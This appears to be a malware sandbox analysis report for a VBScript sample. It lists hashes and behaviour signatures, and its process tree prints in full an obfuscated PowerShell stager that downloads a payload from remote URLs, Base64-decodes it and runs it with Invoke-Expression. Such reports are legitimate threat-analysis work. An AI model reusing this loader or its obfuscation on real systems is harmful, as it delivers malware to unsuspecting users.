Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

1

561072bf60...72.vbs

windows7-x64

8

561072bf60...72.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/06/2024, 01:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    561072bf60c33ed6cfc54afc54024edc70f09ef75d8b4ccd08be30aa118b8e72.vbs

  • Size

    187KB

  • MD5

    390112d76dc2b8ef98de61363c2bd2ea

  • SHA1

    467811ef0dbaebc381e8c18ed248aa6339a35a83

  • SHA256

    561072bf60c33ed6cfc54afc54024edc70f09ef75d8b4ccd08be30aa118b8e72

  • SHA512

    1e6ec942c13e1da2b152049f4601e17f9e1150ac1d842b857c47c1ca88cccb61d6a9620521b6726534dbb0d0dc6e27afe159c6ca966c4cb264312a056b7574ec

  • SSDEEP

    3072:9mN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZT:908GxbKja3+DCbKCvBB/WnHXC/sLJFJI

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\561072bf60c33ed6cfc54afc54024edc70f09ef75d8b4ccd08be30aa118b8e72.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3160
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Lagringskapaciteten Pauciplicate Opsmningen206 Raasyltendes Teserne117 Immenseness Offentligs112 Pollinarium154 Kalejdoskopet Saurornithic Archigony9 Dorsimesal atomatic Fiberplade Forrentet Paratroopers Skolemodenhedsprverne netlister Regelmssigstes Weelfard Nonemphatical Exanthem Tablefellow Phytophysiology Lagringskapaciteten Pauciplicate Opsmningen206 Raasyltendes Teserne117 Immenseness Offentligs112 Pollinarium154 Kalejdoskopet Saurornithic Archigony9 Dorsimesal atomatic Fiberplade Forrentet Paratroopers Skolemodenhedsprverne netlister Regelmssigstes Weelfard Nonemphatical Exanthem Tablefellow Phytophysiology';If (${host}.CurrentCulture) {$Giveren++;}Function Discommoded($Fuksernes){$labialises=$Fuksernes.Length-$Giveren;$Beregningsenhedernes='SUBsTRI';$Beregningsenhedernes+='ng';For( $Triazoles=1;$Triazoles -lt $labialises;$Triazoles+=2){$Lagringskapaciteten+=$Fuksernes.$Beregningsenhedernes.Invoke( $Triazoles, $Giveren);}$Lagringskapaciteten;}function Hindres($Etherealized){ . ($Iturevet) ($Etherealized);}$Skihopperes=Discommoded '.MDoEz iHl l,aP/ 5 . 0 ,(IWSidnVdMoRw,sD N TM 1 0B.P0 ;T RWMi n 6M4M;D RxS6.4V;P .rTv.: 1R2S1.. 0F)R HGBeAcNk oS/P2C0,1 0a0 1 0X1 FUi.rSeEfPo.xI/ 1 2 1B.G0S ';$Produktionsudvidelse=Discommoded 'DU sSe.rB-RABg e n tG ';$Teserne117=Discommoded ' httBtmp.sK:L/./ eTv oTlLuUxAc o nPt a b i lEi,d,a d,e .ScHo mT.,bmr / pSusbL/IT aFasrse.pEeDrFsTe dGeUsP.,sBe aF>ahAtStBp sS:A/ /,eOu,rBoF-Af iJe,r.-Gv e cKh,iJ..rBo./dTSaPasr eSp e,rFs.eSd eMs .EsCe a ';$recessens=Discommoded 'W>T ';$Iturevet=Discommoded 'SiDeIxE ';$Zygosphene='Pollinarium154';$Preexperiment = Discommoded 'Oe cDh,o. % aGp pSdAaPtAan% \LU.n,a sHp i r i n,gH.AITr iF .&L&, BePcTh o t. ';Hindres (Discommoded ',$VgPl o,bAaul :,M i,c r,o c o,s mAo.l oMgUyD=S(.cLmTd / c. ,$.PMrYe e xApAe rPiCm eKn tF)P ');Hindres (Discommoded ',$DgBlPo bAaDl : R,a a,sTyTlMtseCnpdReTsT= $AT.eTsbeBr,n eE1 1D7 .Cs p lIiDtA( $Lr.e cSe sJsoe nCs )U ');Hindres (Discommoded '.[ENDeFtO. S e,r vDi cKe,P.o iTnPt M a ncaHg eUrT],:L:,SYebc,u,r i tFyMP,rSoPtOoTcSo,l, P=U [ NfeAt ..S e cOuRrCiAt yHPTrRo.t,oUcboSl T y pUeS]C:.:,T l.sO1 2S ');$Teserne117=$Raasyltendes[0];$Samlebaandet= (Discommoded 'O$ gGlAo.bMaBlR:.sStPr,iAt =VN e wD- O bIjGe.cGt ,SRy,s.t eRmS. NZe t .RWSeSb CBluiNeLn,t');$Samlebaandet+=$Microcosmology[1];Hindres ($Samlebaandet);Hindres (Discommoded 'S$ sStSrLiDtT. H,efaJdMe r,s [,$SP.rSoFd uAkMt i o.n sGuCd v i d,eUlYs eA] =b$AS kSi h,oFpLp e rSeTs, ');$programfejlene=Discommoded ' $.s.tGrCiTt .TD,o,wVnMl.o aLdFFUiGlHe,(U$ TCe s.e r n e.1s1,7 ,T$,EBx.aSnSt.h e m ). ';$Exanthem=$Microcosmology[0];Hindres (Discommoded ',$.gHl oSb a.l,:,Ecs.b,nGdOe,rBuRp = ( TRe s tF- P.a tMh. C$LE.xIa n tChPeTm,) ');while (!$Esbnderup) {Hindres (Discommoded ' $Rg l oBbIa l.:LKIuSlNtLi,vAe r,i.n,g.e r nKedsV=F$StRrCuVe ') ;Hindres $programfejlene;Hindres (Discommoded ',S t a,rDtm-CSIlse eSpF T4K ');Hindres (Discommoded 'K$,gCl oDb aklN:,E,sFbSnCdPeDrFu.pS= (.T.eEs,t -dP a t hg $DEWxOatn t hIe mA) ') ;Hindres (Discommoded '.$GgPl,o,bTa,lO: OTpAs mmnAiUnSgTe n 2 0.6 = $DgRl oFb,aGlP: P,a u,c i,pSl iBc.aRt es+,+ %W$SRsa a sDyZlLtIe nBdUe.s . cBo u n t ') ;$Teserne117=$Raasyltendes[$Opsmningen206];}$skyttelavets=369419;$evilness=26923;Hindres (Discommoded 'S$Fg,l o b a l.: KFaelSe.jGd o.s kOo p e t .=S MGHe tv- CToln t,eCnUt. K$.EAx aSn t hSe.m ');Hindres (Discommoded 'G$.gtl,oAb.a.lF:RWRrsiSs t lHe,tP = S[KSSy s,tUeRmS. CkoPnAv.esrbtr]I:R:AFAr oTmSBCaFsFeP6P4NS t r,i nIg (,$DKPa l,eSjUd oAs k oTp.eGtt). ');Hindres (Discommoded 'S$CgilVoAb aal.: DZo rns.iEm e.sSa,lO =R [FS y.sLt e.m.. T,e,x tG.AEMnAcLoKd.i n gC]D: :SA,SSCTI I.. G eTtVS tPrMi,nug (P$ W,r iDs.tRlSeSt.). ');Hindres (Discommoded 'm$ gHlIo,bCaFl :IR ePdUe g.rReXl.s.e,n,s =.$ D oLr sMi mBe s a lU.SsDu bBs t rSiMnIg ( $cs k y t.tDeAl.a.vDeSt sM,Q$SeSvGiUlan,e sDs.)K ');Hindres $Redegrelsens;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2872
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unaspiring.Iri && echo t"
        3⤵
          PID:4316

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n3io3joe.1g1.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/2872-0-0x00007FF89D893000-0x00007FF89D895000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2872-10-0x00000237DB1D0000-0x00000237DB1F2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2872-11-0x00007FF89D890000-0x00007FF89E351000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2872-12-0x00007FF89D890000-0x00007FF89E351000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2872-13-0x00007FF89D890000-0x00007FF89E351000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2872-14-0x00007FF89D893000-0x00007FF89D895000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2872-15-0x00007FF89D890000-0x00007FF89E351000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2872-16-0x00007FF89D890000-0x00007FF89E351000-memory.dmp

      Filesize

      10.8MB

      Download